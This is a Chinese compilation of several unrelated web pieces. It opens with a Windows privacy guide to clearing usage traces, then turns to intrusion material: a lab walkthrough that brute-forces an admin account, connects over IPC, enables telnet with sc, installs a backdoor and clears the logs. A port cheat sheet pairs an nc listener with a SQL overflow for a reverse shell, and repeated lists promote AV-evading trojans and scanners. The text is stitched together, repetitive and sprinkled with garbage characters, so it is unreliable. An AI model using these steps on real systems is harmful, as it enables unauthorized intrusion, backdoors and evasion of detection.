一、电脑使用痕迹清除技巧20140415-5073-1645540
电脑使用记录清除技巧大放送
我们知道,自进入Windows系统后,Win 9X/2000/XP中的一切操作都将被记录并
保存在硬盘中。此项功能原本是系统设计者为方便用户设置的,但没想到会
成为泄露电脑信息的漏洞。窥探者在用户刚用过的计算机中查找一阵后,就
会发现大量信息:刚使用的文档、QQ号码、访问过的Internet网站等等,这
些“记录”可能会把用户“隐私”泄露,使有户的信息安全受到威胁。如果
你不想你的信息被泄露,请看本文为你介绍的防堵这些“漏洞”的方法。
1、“我最近的文档”选单
“开始”的“我最近的文档”选单中,以快捷方式的形式保存着用户最
近使用过的15个文件(包括网上下载的并已经打开过的文件)。通过它,我
们可以迅速打开最近一段时间内编辑的文件。对于使用计算机编辑个人文档
的朋友来说,无疑会向他人泄露自己的秘密。
清除方法:
1)右键单击“开始”按钮,然后单“属性”。
2)在“开始”菜单选项卡上,单击“开始”菜单,然后单击“自
定义”
3)在“高级”选项卡上,单击“清除列表”。或干脆将此功能关闭,即
取选中的“列出我最近打开的文档”选单。
2、“运行”记录
使用Windows系统中“开始”选单中的“运行”选单项运行程序或打开文
件,退出后,“运行”中运行过的程序及所打开过文件的路径和名称会被记
录下来,并在下次进入“运行”项时,在下拉列表框中显示出现供选用。这
些记录也会向他人泄露,需要清除。
通过修改注册表项可以达到清除这些“记录”的目的。首先通过Regedit进行
注册表编辑器,找到
HKEY_CURRENT_USER_Software\Microsoft\Windows\CurrentVersion\ Explore
r\RunMRU,这时在右边窗口将显示出“运行”下拉列表显示的文件名,如果
用户不想让别人知道某些记录的程序名,将它们删除就可以了。具体方法是
:用鼠标选中要删除的程序名,再选注册表编辑口中的“编辑”选单中的“
删除”项,“确认”即可。关闭注册表,然后重新启动计算机后,刚才删除
的项就不会再显示了。
3、清除“开始/查找”中的历史列表
你会问这也算历史记录吗?当然算。在“开始/查找”下拉菜单中,有你
所查找的所有文件列表,清除方法如下:运行注册表编辑器Regedit 程序,依
次选
HKEY_USERS\.Default\SoftWare\Microsoft\Windows\CurrentVersio n\Explo
rer\Doc Find Spec MRU,右面窗口中出现的即是“开始/查找”对话框中输
入的文件,在此可选择性地将不需要的历史记录删除。其实在这里还有另外
一个作用,如果你是单机用户,也可以仿照列表为自己创建查找文件了。
4、“历史”记录
用IE浏览器浏览文件后,在Windows\History文件夹中将“自动”记录最近数天(最近可记录99天)的一切操作过程,包括去过什么网站、看过什么
图片、打开过什么文件等信息。这个文件夹相当独特,不能进行备份,但会
暴露用户在网上及计算机上的“行踪”。不想让他人知道用户的“行踪”的
话,要坚决、彻底清除它。清除它的办法有两种。
1)从资源管理器中找到Windows目录下的History文件夹,将其中的所有文件
全部删除。
(2)在“控制面板”中找到并找开“Internet选项”,在“常规”标签
中,单击“清除历史记录”按钮,然后单击“确定”。或将“网页保存在历
史记录中的天数”设置为“0”天,然后单击“确定”
5、Office的“文件”选单
大家都知道,使用Microsoft Office家族的Word、Excel等软件进行工作
后,会在“文件”菜单中留下“记录”,由于“工具”菜单中“选项”项中
所设置“列出最近所用的文件数”不同,“文件”菜单中所“记录”的文件
个数也不相同,但都会记录用户最近操作过的文档。如果不想让他人知道这
些内容,就删除它吧。可以按“Ctrl+Alt+-(减号)”键,光标会变成一个
粗“减号”,打开“文件”菜单后,用粗“减号”单击需要删除的文档即可
。或者将“列出最近所用的文件数”设置为“0”个。方法是:单击“工具”
菜单,选择“选项”命令,打开“常规”标签,选择“列出最近所有文件”
选项,在其后的输入框中将文件个数设置为“0”,最后单击“确定”按钮。
Wrod2000等Office2000系列软件中的“打开”对话框新增了一个“历史”按
钮,它保存了最近使用过的数十个文件的快捷方式,利用它可以快速打开最
近使用过的文档。所以,用户一定要及时删除其里面的内容。
6、非法操作时所产生的“被挽救的文档”
我们在使用Word 97/2000/xp等office软件的过程中,有时会遇到“非法
操作”提示,或是操作中机器突然断电等一些意外的情况,这样,在硬盘中
我的文档、桌面或安装office软件的分区的根目录中会冒出一些“被挽救的
文档”,这点在Windows 9X/me中体现的很明显,这些“被挽救的文档”,可
能就是用户刚刚编辑的文稿的全部或部分内容。所以,要提防“秘密”在此
泄露,不用客气,删除它。
7、Temp中的“东东”。
我们常用的办公软件和其他应用程序通常会临时保存用户的工作结果,
以防止意外情况造成损失。即使用户自己没有保存正在处理的文件,许多程
序也会保存已被用户删除、移动和复制的文本。这些“内容”被存放在
\Windows\Temp目录下。应定期删除各种应用程序在\Windows\Temp 文件夹中
存储的临时文件,以清除上述这些零散的文本。还应删除其子目录中相应的
所有文件。虽然很多文件的扩展名为.tmp,但它们其实是完整的DOC 文件、
HTML文件、甚至是图像文件。
还有,在网上下载的部分内容,在Foxmail中打开邮件的“附件”,也会在
\Windows\Temp文件夹中留下备份。所以,对于\Windows\Temp文件夹中的内
容,最好一个不留全部清除。
8、Windows的“日志”文件
存放在Windows目录下的SchedLgU.txt是“计划任务”的“日志”,它忠
实的记录了以往计划任务的执行情况,以及用户每次开机启动Windows系统的
信息。可以用任何字处理软件打开它。所以,用户的“开机”及一些“任务
(程序)”的执行信息,都会由此“暴露”。
要想修改SchedLgU.txt文件,需要一些周折,因为,用Windows系统下的任何
编辑软件都只能打开它但不能做修改保存。如:我们有和“记事本”打开了
SchedLgU.txt文件后,可以在屏幕上进行添加、删除等编辑操作,但你试图
将编辑后的SchedLgU.txt文件存盘时,系统提示“无法创建
C:\windows\SchedLgU.txt,请确定路径及文件名是否正确。”按“确定”按
钮后,退出“SchedLgU.txt”文件。即使进行Windows系统中的
“MS-DOS”方
式,用Edit编辑也不行。要想对SchedLgU.txt文件进行修改,只能以纯DOS方
式启动计算机,然后再用“Edit”命令编辑。
9、文档的“属性”信息
对于存储在公用电脑上的Word文档,许多用户采取设定“找开权限密码
”以防止未经授权用户打开的办法,来防止泄露有关该文档的信息。但是,
该文档的“属性”却会泄露你的信息。
Word中的“属性”对话框包括“常规”、“自定义”、“摘要”三张选
项卡。第一次保存文档时,计算机会将文档中第一行的内容存放到“摘要”
选项卡中的“标题”框中(通常是用户写作的“题目”)。查看文档的属性
,虽然依据文件名无法判断出文档的内容,但“摘要”选项卡“标题”框中
(该文档的第一行内容)的内容,却会泄露文档的秘密。由于“打开权限密
码”只限制打开文档,并不限制打开“属性”对话框,所以,“标题框”是
一个易被忽视的泄密漏洞。
堵住这个泄密漏洞的方法是:用户在第一次保存文档后,打开“属性”对话
框,将“摘要”选项卡中的“标题”框中的内容删除即可。
10、“写字板”中的记录
同Word、Excel等办公软件一样,写字板也会保存,打开的最新的文件名
称,并将这些名称保存在它的“文件”菜单中,这一方便用户的设置无疑又
对文档的保密性,遭成威胁。对于Word等办公软件中的记录很容易清除,这
里要想清除“写字板”中的记录,就要费一番周折了:先用Regedit 打开注册
表,展开
“HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersio n\Apple
ts\Wordpad\Recent Filelist”分支,将其对应的主键值全部删除,再重新
启动计算机,即可清除写字板的“文件”菜单中的历史记录。
11、“回收站”也会泄密
“回收站”是已删除文件的暂时存放处。用户在删除文件时,并不是将
要删除的文件直接从计算机中完全删除,这些文件会被暂时的存放在回收站
中,在“清空回收站”之前,存放在那里的文件并没有直正从硬盘上删除。
如果你删除的文件,没有在回收站中被清空,那么窥探者可以从“回收站”
中恢复(还原)被删除的文件,发现用户的工作内容。所以,每次结束操作
,离开计算机前,别忘了清空你的回收站。或者是,在删除文件,选按住键
盘上的“Shift”键,然后要选择“删除”命令,这时计算机会提示“确实要
删除某某某文件”,选择“是”则文件被直接删除,并不进入到“回收站”
中。
12、“剪贴板”中的信息。
剪贴板是Windows平台上程序之间静态交换“信息”的地方,它是由
Windows在内存中开辟的临时存储空间。不管什么时候剪切、复制和粘贴信息
,在新的信息存入之前或是退出Windows之前,都一直保存着已有的内容信息
。而且,像Word等Office家族的办公软件可以存储12个“剪贴”信息,打开
一文字编辑软件,选择一下“粘贴”命令,则刚才你换的信息,会原原本本
的展现出来,所以,需要保密的话,它也是一个不可忽视的地方。当用户使
用完计算机后,可以关闭或重新启动一下,这时保存在“剪贴板”中的信息
会自动清除。
13、Office“回收站”你清空了吗?
没错,Office也有“回收站”,Office的“回收站”并不是我们电脑桌
面上的那个回收站,它是一个建立在Office安装目录中的临时保存用户曾以
打开过的所有Office文档(包括Word、Excel、PowerPoint等)的目录。它可
以说是Office内部的一个小天地。如果其它非法用户查看到这个被人们遗忘
的角落,机密就有可能泄露。其实只要找到这个临时文件夹,我们就可以像
删除其它临时文件一样来彻底清除我们使用Office时所留下的痕迹。需要注
意的是不同的操作系统该临时文件夹的位置也不相同:
Windows98/me:
C:\windows\Application Data\Microsoft\Office\Recent
Windows2000/xp:
C:\Documents and Settings\Username\Application
Data\Microsoft\Office\Recent
还要说明的是,在Windows2000/xp系统中Username表示的是你的计算机
名称,如:你的计算机名称叫“computer”那么这时Username文件夹就是
Computer。
你所处理过的所有的Office文档的快捷方式就全在里面了,Office的“
回收站”你清空了吗?
14、清除Windows Media Player的历史记录
Windows Media Player中的“文件”菜单也会保存最近所使用过
的文件
名,一句话,删除它。要删除播放列表项目,请按照下列步骤操作:
(1). 启动注册表编辑器 (Regedt.exe)。
(2). 找到并单击下面的注册表项:
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\Rece ntFileL
ist
选中要你要删除的历史记录列表就可以了。
(3). 如果你使用的是 Windows Media Player 6.4,请单击“RecentURLList”,然后单击“编辑”菜单上的“删除”。
如果你使用的是 Windows Media Player 7、7.1 或 Windows Media Player for Windows XP,请单击“RecentFileList”,然后单击“编辑”菜
单上的“删除”。
(4). 最后退出注册表编辑器。
15、清除RealOne Player历史记录
RealOne具有和Windows Media Player一样的“记忆”功能,要想删除这
些“记忆”。首先启动RealOne Player,在菜单栏上单击“工具”菜单,在
弹出的菜单项上选择“参数设置”,然后在弹出的对话框“类别”列表中选
择“普通”项,在右边的对话框中单击“清除历史记录”,这样就将文件菜
单和位置栏中的历史记录清除掉了。
16、曾访问的网页
为了加快浏览速度,IE会自动把用户浏览过的网页做为“临时文件”,
保存在\Windows\Temporary Internet Files文件夹中,这些“记录”文件会
被MS IE Cache Explorer一类的程序一览无遗。
解决方法:
从资源管理器进入该文件严中,全选所有网页,删除即可。或者打开IE
浏览器属性,在“常规”栏目下单击“Internet临时文件”项目的“删除文
件”按钮(这种方法不太彻底,会留少许Cookies在目录内)。如果浏览过的
网页较少且希望保留部分网页时,在上述目录中查找并删除不想要的网页即
可。
17、Cookies文件夹
Cookies翻译为中文就是“小甜饼”。找开\Windows\Cookies,该目录下
有很多文件,这些都是一些网站“白送”的,当用户访问这些网站时,它们
便会自动记录用户所访问的内容,浏览的网页,并“储存”在Cookies 文件夹
中,以便下次达到快速链接,加快浏览速度。
\Windows\Cookies文件夹中的数据,类型如abc@202.102.221.56[1],大都是
:windows用户名+@+域名或IP地址,并以文本形式保存。这类文件
多不仅会
占用大量的硬盘空间,而且会暴露用户的行踪。
解决方法:
将\Windows\Cookies文件夹中的文件删除(除系统自身形成的“Index.dat”外)。
18、浏览过的地址(URL)
经常上网的人都知道,浏览器会为你保留你的曾经打开过的URL 并为其建
立一个历史文件夹,所以你可以在任何时候打开浏览器中的URL历史记录,来
打开曾经打开过的网址。但这也给我们这些需要为历史保密的操作者造成了
困难。清除URL历史记录方法如下:打开浏览器(这里以IE为例),执行“工
具/Internet选项…”,在打开窗口的“常规”页面中,在“Internet 临时文
件”中点击“删除文件”按钮将临时文件夹删除,在“历史记录”中点击“
清除历史记录”按钮将历史记录删除,这样你就不用担心自己曾打开的网址
被别人知道了。
注意,在windows98/2000/XP中,还有一处“隐藏”的“地址”栏,它同
样也会记录用户曾经去过的网址。该“地址”栏在“任务栏”上(在“任务
栏”的空白处单击鼠标右键——“工具栏”——选择“地址”),在
地址”栏中输入网址便能激活IE浏览器上网,输入的网址就被记录下来。还
好,此处的“记录”被放在\Windows\Hisory文件夹中,非常容易清除。在此
说明的是,不要因为IE浏览器的“地址”栏和资源管理器的“地址”栏中没
“记录”,就觉得万事大吉了。
19、“收藏夹”中的记录
大多数朋友上网时,常把喜爱的网址添加到“收藏夹”中,甚至设置为
“允许脱机使用”,其优点当然是便于下次快速地进行浏览。但用户的兴趣
和爱好就必然会暴露无遗了。\Windows\Favorites文件夹,就是“收藏夹”
的位置,要想清除“收藏夹”的历史记录,只要进入它,选中目标文件,执
行删除操作即可。
20、使用QQ后
若按默认目录安装QQ,那么在QQ的安装目录下就可以看以许多的帐号,
细心的你就会发现那不就是你的你的QQ号吗?对就就是你的QQ号,打开文件
夹后,就会发现里面有许多文件,那就是你聊天的记录,如果遇到电脑高手
的话,那么你的信息就危险,想保护你信息的唯一方法就是删除它。
方法:一是,直接在QQ的安装目录下找到你的帐号文件夹,将其完全删除;
二是在QQ上登录你的账号,然后选择“清除记录”,在输入你的QQ 密码后,
你的账号及对应的记录文件(聊天信息)就会被删除掉。如果你是在网吧上
QQ聊天,笔者强烈建议你使用“网吧模式”登录(只限于QQ2004版。因为选
用此模式后,当你退出QQ时计算机后提示你是否删除你的聊天记录。
21、其它
Windows下的一些应用程序中,其“文件”菜单都蕴藏着丰富的历史记录
,不可小视,均需要处理。除使用上述的方法手动清除历史记录外,我们还
可以借用一些外部软件来清除计算机中的历史记录,这里笔者向大家推荐一
款功能强大的历史记录清除工具——HistoryKill 2003,安装完成后的
HistoryKill会伴随Windows一同启动,并驻留在系统托盘区中,但并不会占
用过多的系统资源(如图26)。该软件即可以清除上网浏览的历史记录,也
可以快速清除Windows系统历史记录,且使用方法简单,使用公用计算机的朋
友们,不防试一下。
清除计算机的使用记录是一个很古老的话题了,在这里总结出来写给大
家,希望对使用公用计算机的朋友们能有所帮助。
windows使用痕迹消除的方法:
一般大家都用软件设置“退出时清除最近打开的文档的记录”
其实运行“gpedit.msc”-“用户配置”-“管理模板”-“任务栏和『开始』菜单”-“不要保留最近打开文档的记录”设为启用就可以了。
清除最近使用过的文档记录
1.以WindowsXP为例,右键点击“开始”按钮,选择“属性”,在弹出的设置任务栏和开始菜单属性对话窗中点“自定义”按钮,在“自定义开始菜单”对话框中的“高级”标签下点“清除列表”。若要让系统永不自作多情记住使用文档的记录,请去掉“列出我最近打开的文档”前的钩。
小提示:XP会把最近访问文档的快捷方式放在C:\Documents and Settings\用户名\Recent中,手工删除它们也能让文档菜单“失去记忆”。
2.删除临时文件夹中的内容
当执行过安装软件、打开文档等操作时,在临时文件夹中会留下相应文件,可以手工清除在下列位置中的内容:C:\Windows\Temp、
C:\Documents And Settings\用户名\Local Settings\Temp。如在删除时提示有文件在使用,就需要关掉相关程序,最好重启一次再删除。
3.清除“运行”、“查找”等处的历史记录
清除“运行”对话框中记录的输入内容,可修改注册表。这些记录被保存在“HKEY_CURRENT_USER
\Software\Microsoft\Windows\CurrentVersion\Explorer\
RunMRU”分支下,将其完全删除后重启。此外,该主键下的“DocFindSpecMRU”项,在右侧栏目中显示的是“查找”的历史记录,可一并删除。
2.今天遇到了电脑主机我关闭之后,居然有一个移动硬盘仍然再转这种情况。
虽然USB是热插拔的,但是强制性拔出移动硬盘由于指针未归零,可能会造成硬盘损坏,在BIOS里关闭+5V待机电源供电给USB就好了,但这样的USB接可以在关机的时候给数码产品充电!这个功能在商务笔记本上用的比较多!
您是怎样看待黑客及黑客现象的?崇拜?不齿?还是畏惧?本文将向您介绍中国黑客常用的八种工具及其防御方法。需要说明的是,这些只是初级黑客、甚至是不算黑客的“黑客”所使用的工具。在真正的黑客看来这些工具是很初级的,但这些黑客工具对我们普通用户的杀伤力却是非常大的,因此有必要介绍一下它们的特点及防御方法。 本文列出了几种有代表性的黑客工具,我们真正要掌握的当然不是如何使用这些黑客工具,而是通过它们了解黑客攻击手段,掌握防范黑客攻击的方法,堵住可能出现的各种漏洞。 冰河 冰河是最优秀的国产木马程序之一,同时也是被使用最多的一种木马。说句心里话,如果这个软件做成规规矩矩的商业用远程控制软件,绝对不会逊于那个体积庞大、操作复杂的PCanywhere,但可惜的是,它最终变成了黑客常用的工具。 冰河的服务器端(被控端)和客户端(控制端)都是一个可执行文件,客户端的图标是一把瑞士军刀,服务器端则看起来是个没什么大不了的微不足道的程序,但就是这个程序,足以让你的电脑成为别人的掌中之物。某台电脑执行了服务器端软件后,该电脑的7626端口(默认)就对外开放了,如果在客户端输入这台电脑的IP地址,就能完全控制这台电脑。由于个人电脑每次上网的IP地址都是随机分配的,所以客户端软件有一个“自动搜索”功能,可以自动扫描某个IP段受感染的电脑,一旦找到,这台电脑就尽在黑客的掌握之中了。由于冰河程序传播比较广泛,所以一般情况下,几分钟之内就能找到一个感染了冰河的受害者。 防御措施:首先不要轻易运行来历不明的软件,只要服务器端不被运行,冰河再厉害也是有力使不出,这一点非常重要;其次由于冰河的广泛流行,使得大多数杀毒软件可以查杀冰河,因此在运行一个新软件之前用杀毒软件查查是很必要的。但由于该软件变种很多,杀毒软件如果不及时升级,难免会有遗漏,因此要保证您使用的杀毒软件病毒库保持最新。用查杀木马软件如木马克星之类的也可以;安装并运行防火墙,如此则能相对安全一些。 Wnuke Wnuke可以利用Windows系统的漏洞, 通过TCP/IP协议向远程机器发送一段信息,导致一个OOB错误,使之崩溃。现象:电脑屏幕上出现一个蓝底白字的提示:“系统出现异常错误”,按ESC键后又回到原来的状态,或者死机。它可以攻击WIN9X、WINNT、WIN2000等系统,并且可以自由设置包的大小和个数,通过连续攻击导致对方死机。 防御措施:不要轻易点击别人在论坛或聊天室告诉您的网址,那很可能是探测您的IP地址的(如Iphunter就可以做到这一点);用写字板或其它的编辑软件建立一个文本文件,文件名为OOBFIX.REG,内容如下: REGEDIT4 [HKEY_LOCAL_MACHINE\System\CurrentControlSet \Services\VxD\MSTCP] ″BSDUrgent″=″0″
模拟黑客攻击 一、实验环境 本例以攻击一台文件服务器为例,演示通常的攻击方法和思路。该文件服务器默认安装了Windows Server 2003,启动了Windows防火墙但是允许文件共享。其余设置全为默认安装设置,并安装了所有补丁。 二、需求描述 扫描目标主机 获得管理员权限 安装后门 清除攻击记录 三、实验拓扑 四、实验步骤 扫描目标主机 1.使用扫描软件扫描目标计算机,确认开放的端口,判断操作系统的类型。
2.扫描软件推荐使用X-Scan或流光。 获得管理权限 1.根据扫描结果,尝试暴力破解管理员账户和密码。 2.破解后自动生成报告。
入侵目标计算机 1.使用管理员的账号建立IPC链接,命令为“net use \\19 2.168.10.11 123456 /user:administrator”. 使用sc命令获取目标计算机的所有服务列表,并保存在本地。命令为“sc\\192.168.10.11 query type= service state= all >c:\1.txt”(注意:两个“=”前无空格,“=”后有空格)。“>c:\1.txt”表示将输出结果保存在本地C盘的1.txt文件内。
2.打开1.txt文件,找到telnet,确认服务的状态,telnet服务默认为禁用状态。如果知道 telnet服务的服务名称,可直接使用命令行查看,命令为“sc \\192.168.10.11 qc tlntsvr”. 3.去除telnet服务的禁用状态,设置为自动运行,命令为“sc \\192.168.10.11 config tlntsvr start= auto”。然后启用telnet服务,命令为“sc \\192.168.10.11 start tlntsvr”.
常用黑客工具(网络入侵工具) 一、扫描工具 X-scan 3.1 焦点出的扫描器,国内最优秀的安全扫描软件之一!非常专业的一个扫描器! X-way 2.5 这也上一个非常不错的扫描器哦!功能非常多!使用也不难,入侵必备工具! SuperScan 3.0 强大的TCP 端口扫描器、Ping 和域名解析器! Namp 3.5 这个就厉害了,安全界人人皆知的非常有名气的一个扫描器!作者Fyodor Hscan v1.20 这是款运行在Win NT/2000下的漏洞扫描工具,有GUI以及命令行两种扫描方式! SSS 俄罗斯安全界非常专业的一个安全漏洞扫描软件! U-Scan.exe 非常好的UNICODE漏洞扫描工具! RpcScan V1.1 可以通过135端口枚举远程主机RPC连接信息! SHED 1.01 一个用来扫描共享漏洞的机器的工具! DSScan V1.00 ms04-011 远程缓冲区溢出漏洞扫描专用! Dotpot PortReady1.6 该软件为“绿色软件”,无需安装,非常小巧(仅23KB),具有极快的扫描速度! WebDAVScan v1.0 针对WEBDA V漏洞的扫描工具! 注意:该软件解压缩时会被查杀! Socks Proxy Finder2 扫描端口速度非常快的一个工具,扫描完毕后还可以导出保存起来! SQLScan v1.2 猜解开着1433端口的住机密码工具! RPC漏洞扫描器v1.03 针对RPC漏洞扫描的工具! 流光5.0 破解版国内大名鼎鼎的黑客扫描工具,由高级程序员小榕编写! 自动攻击探测机Windows NT/2000 自动攻击探测机 4899空口令探测能够快速的扫描到被安装了radmin服务端4899端口的空口令IP! 二、远程控制
【托管服务qin】黑客常用的几种入侵端口的方法 服务器托管, BGP, 光钎专线, 防火墙, 新一代IDC 工欲善其事,必先利其器,本文简单介绍目前黑客最常使用的一些入 侵工具及防御的方法,希望能对大家有所帮助,以助于大家能更好地防御黑客的攻击。" ^' D( E3 K! N) ^! c 1. 1433端口入侵 scanport.exe 查有1433的机器 SQLScanPass.exe 进行字典暴破(字典是关键)7 L5 a9 T" E: C& x' k* C 最后SQLTools.exe入侵4 r+ F" q g9 j- K9 m* x4 o' E =============================2 z0 ~3 T) K5 n8 W; Z 对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。 nc -vv -l -p 本机端口sqlhelloF.exe 入侵ip 1433 本机ip 本机端口 (以上反向的,测试成功)) Q) Q7 K+ L! J$ o6 Z9 w( a sqlhelloz.exe 入侵ip 1433 (这个是正向连接)% J3 L6 x8 y: t; p 2. 4899端口入侵9 `" f0 r# k2 ^: F 用4899过滤器。exe,扫描空口令的机器 3. 3899的入侵 对很早的机器,可以试试3389的溢出(win3389ex.exe) 对2000的机器,可以试试字典暴破。(tscrack.exe)* X8 }: O! |2 }& x7 M 4. 80入侵+ J9 [0 L4 _) B! K 对sp3以前的机器,可以用webdav入侵;
黑客工具包大全 一、扫描工具 X-scan 3.1 焦点出的扫描器,国内最优秀的安全扫描软件之一!非常专业的一个扫描器! X-way 2.5 这也上一个非常不错的扫描器哦!功能非常多!使用也不难,入侵必备工具! SuperScan 3.0 强大的TCP 端口扫描器、Ping 和域名解析器! Namp 3.5 这个就厉害了,安全界人人皆知的非常有名气的一个扫描器!作者Fyodor Hscan v1.20 这是款运行在Win NT/2000下的漏洞扫描工具,有GUI以及命令行两种扫描方式! SSS 俄罗斯安全界非常专业的一个安全漏洞扫描软件! U-Scan.exe 非常好的UNICODE漏洞扫描工具! RpcScan V1.1 可以通过135端口枚举远程主机RPC连接信息! SHED 1.01 一个用来扫描共享漏洞的机器的工具! DSScan V1.00 ms04-011远程缓冲区溢出漏洞扫描专用! Dotpot PortReady1.6 该软件为“绿色软件”,无需安装,非常小巧(仅23KB),具有极快的扫描速度! WebDAVScan v1.0 针对WEBDAV漏洞的扫描工具! 注意:该软件解压缩时会被查杀! Socks Proxy Finder2 扫描端口速度非常快的一个工具,扫描完毕后还可以导出保存起来! SQLScan v1.2 猜解开着1433端口的住机密码工具! RPC漏洞扫描器 v1.03 针对RPC漏洞扫描的工具! 流光5.0 破解版国内大名鼎鼎的黑客扫描工具,由高级程序员小榕编写! 自动攻击探测机 Windows NT/2000 自动攻击探测机 4899空口令探测能够快速的扫描到被安装了radmin服务端4899端口的空口令IP! 二、远程控制 黑洞免杀版藏鲸阁-陈经韬编写的著名远程控制程序!该版本还是8月15最新版的哦! 冰河免杀版国内最有名,历史最悠久的木马冰河!本版本是冰河的最新版本,服务器端只有16KB! 灰鸽子迷你版灰鸽子工作室-葛军同志的作品! 网络神偷 5.7 网络神偷是一个专业级的远程文件访问工具!具有反弹功能! 广外女生 1.53 广州-广外女生小组的作品,曾风靡一时! 注意:该软件解压缩时会被查杀! Radmin3.2影子版非常有名的监视程序!并非木马,所以服务端不会被查杀! 黑...................... 2.0 使用跟Radmin一样,功能明显比它多,扫描速度也非常快!风雪远程控制 v3.9 基于TCP/IP协议的远程管理网络工具,一个具有反弹功能的工具,非常小巧! 无赖小子 2.5 无赖小子2.5,08月23日发布,其默认端口8011! 蓝色火焰 v0.5 蓝色火焰是一个没有客户端的木马,可谓无招胜有招!注意:该软件解压缩时会被查杀! 网络公牛国产公牛木马,由于上传文件大小限制,包中没有加入易语言运行库文件krnln.fnr! GoToMyPC 4.00 安装简单;能够从任何安装有浏览器的计算机上访问主机;具有新的安全功
黑客常用工具集 一、扫描工具 X-scan 3.1 焦点出的扫描器,国内最优秀的安全扫描软件之一!非常专业的一个扫描器! X-way 2.5 这也上一个非常不错的扫描器哦!功能非常多!使用也不难,进侵必备工具! SuperScan 3.0 强大的TCP 端口扫描器、Ping 和域名解析器! Namp 3.5 这个就厉害了,安全界人人皆知的非常有名气的一个扫描器!作者Fyodor Hscan v1.20 这是款运行在Win NT/2000下的漏洞扫描工具,有GUI以及命令行两种扫描方式! SSS 俄罗斯安全界非常专业的一个安全漏洞扫描软件! U-Scan.exe 非常好的UNICODE漏洞扫描工具! RpcScan V1.1 可以通过135端口枚举远程主机RPC连接信息! SHED 1.01 一个用来扫描共享漏洞的机器的工具! DSScan V1.00 ms04-011远程缓冲区溢出漏洞扫描专用! Dotpot PortReady1.6 该软件为“绿色软件”,无需安装,非常小巧(仅23KB),具有极快的扫描速度! WebDAVScan v1.0 针对WEBDAV漏洞的扫描工具! 留意:该软件解压缩时会被查杀! Socks Proxy Finder2 扫描端口速度非常快的一个工具,扫描完毕后还可以导出保存起来! SQLScan v1.2 猜解开着1433端口的住机密码工具! RPC漏洞扫描器 v1.03 针对RPC漏洞扫描的工具! 流光5.0 破解版国内大名鼎鼎的黑客扫描工具,由高级程序员小榕编写! 自动攻击探测机 Windows NT/2000 自动攻击探测机 4899空口令探测能够快速的扫描到被安装了radmin服务端4899端口的空口令IP! 旁注专用检测程序 1.2 旁注进侵专用检测程序,主要功能有查询虚拟主机域名和批量检测上传漏洞! 二、远程控制 黑洞2004 免杀版躲鲸阁-陈经韬编写的著名远程控制程序!该版本还是8月15最新版的哦! 冰河2004 免杀版国内最有名,历史最悠久的木马冰河!本版本是冰河的最新版本,服务器端只有16KB! 神气儿最新2.0版国产远程控制程序,DLL进程插进,IP反向连接!由第八军团出品! 灰鸽子迷你版灰鸽子工作室-葛军同道的作品! 网络神偷 5.7 网络神偷是一个专业级的远程文件访问工具!具有反弹功能! 广外女生 1.53 广州-广外女生小组的作品,曾风靡一时! 留意:该软件解压缩时会被查杀! Radmin3.2影子版非常有名的监视程序!并非木马,所以服务端不会被查杀! *** 2.0 使用跟Radmin一样,功能明显比它多,扫描速度也非常快! 风雪远程控制 v3.9 基于TCP/IP协议的远程治理网络工具,一个具有反弹功能的工具,非常小巧! 无赖小子 2.5 无赖小子2.5,08月23日发布,其默认端口8011! 蓝色火焰 v0.5 蓝色火焰是一个没有客户真个木马,可谓无招胜有招!留意:该软件解压缩时会被查杀! 网络公牛国产公牛木马,由于上传文件大小限制,包中没有加进易语言运行库文件krnln.fnr! GoToMyPC 4.00 安装简单;能够从任何安装有浏览器的计算机上访问主机;具有新的安全功能! 二、远程控制 黑洞2004 免杀版躲鲸阁-陈经韬编写的著名远程控制程序!该版本还是8月15最新版的哦! 冰河2004 免杀版国内最有名,历史最悠久的木马冰河!本版本是冰河的最新版本,服务器端只有16KB! 神气儿最新2.0版国产远程控制程序,DLL进程插进,IP反向连接!由第八军团出品! 灰鸽子迷你版灰鸽子工作室-葛军同道的作品! 网络神偷 5.7 网络神偷是一个专业级的远程文件访问工具!具有反弹功能! 广外女生 1.53 广州-广外女生小组的作品,曾风靡一时! 留意:该软件解压缩时会被查杀!
黑客必备所有工具 一、扫描工具 X-scan 3.1 焦点出的扫描器,国内最优秀的安全扫描软件之一!非常专业的一个扫描器! X-way 2.5 这也上一个非常不错的扫描器哦!功能非常多!使用也不难,入侵必备工具! SuperScan 3.0 强大的TCP 端口扫描器、Ping 和域名解析器! Namp 3.5 这个就厉害了,安全界人人皆知的非常有名气的一个扫描器!作者Fyodor Hscan v1.20 这是款运行在Win NT/2000下的漏洞扫描工具,有GUI以及命令行两种扫描方式! SSS 俄罗斯安全界非常专业的一个安全漏洞扫描软件! U-Scan.exe 非常好的UNICODE漏洞扫描工具! RpcScan V1.1 可以通过135端口枚举远程主机RPC连接信息! SHED 1.01 一个用来扫描共享漏洞的机器的工具! DSScan V1.00 ms04-011远程缓冲区溢出漏洞扫描专用! Dotpot PortReady1.6 该软件为“绿色软件”,无需安装,非常小巧(仅23KB),具有极快的扫描速度! WebDAVScan v1.0 针对WEBDAV漏洞的扫描工具! 注意:该软件解压缩时会被查杀! Socks Proxy Finder2 扫描端口速度非常快的一个工具,扫描完毕后还可以导出保存起来! SQLScan v1.2 猜解开着1433端口的住机密码工具! RPC漏洞扫描器v1.03 针对RPC漏洞扫描的工具! 流光5.0 破解版国内大名鼎鼎的黑客扫描工具,由高级程序员小榕编写! 自动攻击探测机Windows NT/2000 自动攻击探测机 4899空口令探测能够快速的扫描到被安装了radmin服务端4899端口的空口令IP! 二、远程控制 黑洞免杀版藏鲸阁-陈经韬编写的著名远程控制程序!该版本还是8月15最新版的哦! 冰河免杀版国内最有名,历史最悠久的木马冰河!本版本是冰河的最新版本,服务器端只有16KB! 灰鸽子迷你版灰鸽子工作室-葛军同志的作品! 网络神偷 5.7 网络神偷是一个专业级的远程文件访问工具!具有反弹功能! 广外女生 1.53 广州-广外女生小组的作品,曾风靡一时! 注意:该软件解压缩时会被查杀! Radmin3.2影子版非常有名的监视程序!并非木马,所以服务端不会被查杀! 黑...................... 2.0 使用跟Radmin一样,功能明显比它多,扫描速度也非常快! 风雪远程控制v3.9 基于TCP/IP协议的远程管理网络工具,一个具有反弹功能的工具,非常小巧! 无赖小子 2.5 无赖小子2.5,08月23日发布,其默认端口8011! 蓝色火焰v0.5 蓝色火焰是一个没有客户端的木马,可谓无招胜有招!注意:该软件解压缩时会被查杀! 